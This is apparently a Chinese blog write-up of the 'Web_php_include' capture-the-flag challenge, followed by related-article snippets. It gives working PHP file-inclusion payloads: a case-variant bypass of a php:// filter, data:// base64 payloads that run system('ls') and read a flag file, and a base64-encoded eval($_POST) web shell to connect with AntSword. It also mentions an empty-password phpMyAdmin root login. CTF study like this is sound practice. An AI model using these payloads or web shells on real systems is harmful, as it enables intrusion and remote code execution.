攻防世界-Web_php_include [文件包含]

最新推荐文章于 2024-03-25 22:33:08 发布
最新推荐文章于 2024-03-25 22:33:08 发布
阅读量533 收藏
点赞数 2
分类专栏: CTF-web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53146913/article/details/124184008
版权

意思是当传给page的参数里有php://时,会自动过滤掉,但是此函数对大小写敏感,构造Php://就不起作用了,而stristr()函数对大小写不敏感噢。

一、双写、大小写绕过:

大小写可直接绕过。

但是由于源代码中是while循环过滤,所以我们的双写过滤就G了QAQ。

二、利用hello的回显

 我们构造payload,首先要构造hello这个参数我们必须先让传进的page参数为真

page参数用http伪协议访问127.0.0.1这个条件肯定为真

payload:

?page=http://127.0.0.1/?hello=<?php system("ls")?>

?page=http://127.0.0.1/?hello=<?show_source ("fl4gisissh3r3.php")?>

三、data://伪协议传木马

    这里是引用<?php eval($_POST[xiaohua]); ?> base64加密后拼接
    http://111.198.29.45:47062/?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbeGlhb2h1YV0pOyA/Pg==
用蚁剑连接即可。

四、data://伪协议执行命令利用

过滤了php://的协议,那我们就使用data://的伪协议。

data://伪协议php5.2.0起,主要用与数据流的读取。如果传入的数据是PHP代码,就会执行代码。

data://text/plain;base64,xx(base64编码后的数据)

payload:

?page=data://text/plain/;base64,PD89c3lzdGVtKCJscyIpPz4=
<?=system("ls")?> 的base64编码是 PD89c3lzdGVtKCJscyIpPz4=

?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==
<?php system("cat fl4gisisish3r3.php")?>的base64编码是 上面那一串。QAQ

五、御剑

我们尝试另一种方法 通过御剑扫描目录


看到了没 phpmyadmin 登陆地址 直接 root 登陆 密码为空

、、、

这弱口令就真的是让人很无语。。。

六、温故而不知新

php 的执行命令函数: exce, system, passthru。
Linux 查看文件内容: cat 、lesss 、more 、tail 、tac

参考学习:攻防世界 Web_php_include write up - Zhu013 - 博客园

菜菜zhao
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
后缀名检测与绕过之大小写绕过
m0_73720136的博客
05-06 262
掌握文件上传的服务端检测中的后缀名检测原理以及通过大小写的转换来绕过后缀名的检测。
Web漏洞-XSS跨站之代码及Http Only绕过-XSS Labs靶场详细通关教程-WAF绕过及安全修复
ran的博客
03-29 1748
如果您在cookie中设置了HttpOnly属性,那么通过is脚本将无法读取到cookie信息,这样能有效的防止XSS攻击。如果httponly出现的话,使用XSS来获取cookie基本就可以被拦截下来。那么由此我们就会想到,如果遇到了httponly后,我们需要怎么进行操作呢?首先要想到的是,它知识阻止cookie被我们获取到,但是不会阻止跨站语句的执行。Web漏洞-XSS跨站之代码及Http Only绕过-XSS labs靶场详细通关教程-WAF绕过及安全修复
Web_php_include-攻防世界
szhangliwenya的博客
03-25 908
secure_file_priv 这个变量被用于限制导入和导出的数据目录,比如 LOAD DATA 和 SELECT ... INTO OUTFILE 语句,以及 LOAD_FILE() 函数。MySQL 服务器在启动时,会检查 secure_file_priv 变量值,如果值不安全会在错误日志中写一个 WARNING 级别的日志。如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。下述使用data://伪协议,它让用户控制输入流,输入php代码,造成任意代码执行。
文件包含漏洞总结
qq_51763493的博客
09-19 272
这样,我们模拟文件上传,POST PHP_SESSION_UPLOAD_PROGRESS变量,其中,变量的值为php语句,而我们又知道session文件的名字(这里不好用,下一段给出原因)或者直接利用写入session文件的语句创造新的文件,在其它文件中写入小马,再连蚁剑,这样的话就不用去包含了,也就避免了那么多的过滤条件。4x6=24,24÷8=3,正好解码为三个字符,所以这里phpdie需要再补两位,才能完整解码,但是补的这两位不能时我们传入的php语句解码内容,所以我们自动补aa即可。
2021“安恒·泰山杯”山东省网络安全大赛 (1).rar
12-07
2021“安恒·泰山杯”山东省网络安全大赛 CTF 真题
攻防世界之Web_PHP_Include
Mrs_H的博客
10-04 553
攻防世界之Web_PHP_Include 这是一道来自攻防世界web高手进阶题的其中一道题,题目很水,但是身为小白的我也遭遇到了各种各样的问题。所以写一下这道题我所用的wp思路,还有对于其他思路的一些看法。 法一 首先,我们先拿到了这道题的在线场景,打开一看 再结合着题目的意思这是一道文件包含题同时他过滤掉了php://伪协议,我第一反应就是换一个伪协议,将php://换成data://text/plain; 于是构造一个payload:?page=data://text/plain,<?%20sy
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 423
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
php一些函数
m0_54015794的博客
01-15 244
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va
攻防世界之Web_php_include
qq_44111753的博客
11-16 184
WP 攻防世界 Web_php_include 题目 WP 很明显,这题目和文件包含漏洞有关,来分析代码吧 <?php show_source(__FILE__); echo $_GET['hello'];//将hello参数的值输出 $page=$_GET['page'];//get参数提交的page值赋给page while (strstr($page, "php://")) {//若"php://"在page中出现过 $page=str_replace("php://", "", $p
网络攻防课程seed-labs实验-Web_XSS_Elgg.zip
最新发布
06-01
网络攻防课程seed-labs实验-Web_XSS_Elgg.zip
网络攻防课程seed-labs实验-Web_SQL_Injection.zip
06-01
网络攻防课程seed-labs实验-Web_SQL_Injection.zip
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
网络攻防课程seed-labs实验-DNS_Attacks.zip
06-01
网络攻防课程seed-labs实验-DNS_Attacks.zip
网络攻防课程seed-labs实验-Buffer_Overflow_Server.zip
06-01
网络攻防课程seed-labs实验-Buffer_Overflow_Server.zip
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1201
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3344
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界 Web_php_include(include)
Haowill的博客
04-15 966
Web_php_include 一拿到这道题目看到include,我觉得像是一道文件包含漏洞的题目,这种漏洞一般做法有两种 1.包含文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
攻防世界-web-Web_php_include
wuh2333的博客
05-18 178
攻防世界,php_web_include
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4277
ctf学习记录
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值